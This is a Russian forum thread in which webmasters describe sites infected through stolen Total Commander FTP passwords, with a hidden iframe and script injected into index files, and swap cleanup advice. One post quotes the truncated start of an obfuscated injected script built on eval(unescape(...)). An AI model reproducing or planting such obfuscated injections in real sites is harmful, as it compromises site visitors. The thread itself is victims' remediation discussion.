Кто-то вам на форум вставил скрытый фрейм размером 1 на 1 пиксель с информацией с сайта namebuyline. Поменяйте все пароли и удалите этот участок кода.
[Помощь] Вопросы новичков
- Автор темы ДмитрийС
- Дата начала
- Статус
Фрейм - это как бы отдельное окошко в вашем сайте, в которое загружается информация с другого сайта (в вашем случае).
вот здесь можете подробнее почитать
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
- Регистрация
- 3 Авг 2008
- Сообщения
- 104
- Реакции
- 20
- Заблокирован
- #64
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Аналогичная ситуация!!! У меня на всех серверах эта х****** прописалась примерно ??-го марта(пару дней назад), в основном прописывается в индексные файлы после тега <body> либо того, который самый последний, если файл пхп, то может сделать такую каку:
? (содержание строчки) > и собственно файл понятно дело не будет работать.
причина: тоталкоммандер (без вариантов, трой тырит пароли из него)
лечение: сначала меняем все индексные файлы на сервере(убираем строку вредоносную), а потом сразу меняем от сервера пароль. Во время замены заходить на страничку нельзя - эта пакость подгружается в фоновом режиме, доктор веб чтото там кряхтит, но толку от этого никакого.
последующие действия: ставить файрвол
В общем надесь кому пригодится, а я пока продолжаю дальше перепаролировать сервера, второй день уже... Хре**во, когда сайтов много и все пароли в тоталкомандер забиты
изменить можно либо через админку(луше не стоит, оно сбивает теги логотипа которые прописал сам), либо ручьками как ниже -
skin_global (глобальные шаблоны)/global_board_header
в нем ищи
Код:
<!--ipb.logo.start--><img src='style_images/<#IMG_DIR#>/logo4.gif' style='vertical-align:top' alt='IPB' border='0' /><!--ipb.logo.end--></a></div>а если по проще то менай на
Код:
<div id="logostrip">
<img src = "картинко.gif" ></img>
</a></div>
*** скрытое содержание ***
Аналогичная ситуация!!! У меня на всех серверах эта х****** прописалась примерно ??-го марта(пару дней назад), в основном прописывается в индексные файлы после тега <body> либо того, который самый последний, если файл пхп, то может сделать такую каку:
? (содержание строчки) > и собственно файл понятно дело не будет работать.
причина: тоталкоммандер (без вариантов, трой тырит пароли из него)
лечение: сначала меняем все индексные файлы на сервере(убираем строку вредоносную), а потом сразу меняем от сервера пароль. Во время замены заходить на страничку нельзя - эта пакость подгружается в фоновом режиме, доктор веб чтото там кряхтит, но толку от этого никакого.
последующие действия: ставить файрвол
В общем надесь кому пригодится, а я пока продолжаю дальше перепаролировать сервера, второй день уже... Хре**во, когда сайтов много и все пароли в тоталкомандер забиты
Скажите, а сейчас у вас нормально работает?
У меня стёрлось всё с главной страницы. Только теперь на 1 сайте, и вместо всего вставилось:
<Script>
<!--
eval( unescape( "%69%66%28%21%6d%79%69%61%29%7b%64%6f%...(я стёрла дальше, а то там много-много таких цифр)
//-->
</Script>
Что это?
- Регистрация
- 3 Авг 2008
- Сообщения
- 104
- Реакции
- 20
- Заблокирован
- #69
Сейчас уже нормально всё, я дня три сидел только и сервера с сайтами от этой ***** чистил да пароли менял, потом начал проверять и опять нарвался на одной из страниц св. сайта!!!! эту ***** поймал на комп, правда в этот раз я уже успел затереть все пассы в тотале и вроде всё нормально, отправил файлы в dr.web - подтвердили что вирус.
то что у вас (unescape( "%69%66%28%) - примерно тоже самое, у моего знакомого год назад вот именно такой же скрипт прописывался, %69%66%28% - это зашифрованная часть.
почистите сначала комп на вирус, потом меняйте пароль от хостинга (на сам сайт заходить нельзя), поменяете пароль, чистите странички от этик циферок ))) просто так их удалять бесполезно, они всёравно пропишутся, ибо троян который попадает на комп отправляет данные кудато там на сервер (поэтому нужно сначала от троя избавиться а потом менять пароль, а потом чистить странички)
- Статус